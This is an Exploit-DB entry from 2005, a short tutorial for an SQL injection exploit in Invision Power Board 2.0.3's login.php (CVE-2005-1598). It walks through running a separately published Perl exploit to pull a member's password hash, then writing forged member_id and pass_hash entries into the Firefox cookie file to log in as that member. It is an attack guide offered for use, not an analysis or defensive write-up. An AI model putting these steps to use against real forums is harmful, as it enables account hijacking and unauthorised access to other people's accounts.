Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

EDB-ID:

1014

CVE:

2005-1598

EDB Verified:

Author:

Danica Jones

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2005-05-27

Vulnerable App: 
# danica jones <danica6699@gmail.com>

Tutorial for the recent exploit released by Petey Beege.

1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
     a. perl -MCPAN -e 'shell'
     b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id

ex. inv.pl http://forums.example.com 2 2

Where 2 is the login id and 2 for version 2 of IPB.

4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at

C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"

Add the following entries:

forums.example.com        FALSE        /        FALSE		1148708747	  member_id        1
forums.example.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c

Notice the value of member_id and pass_hash taken from the values
generated by the exploit.

5. Fire up Mozilla Firefox and login to http://forums.example.com

Enjoy!


# milw0rm.com [2005-05-27]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services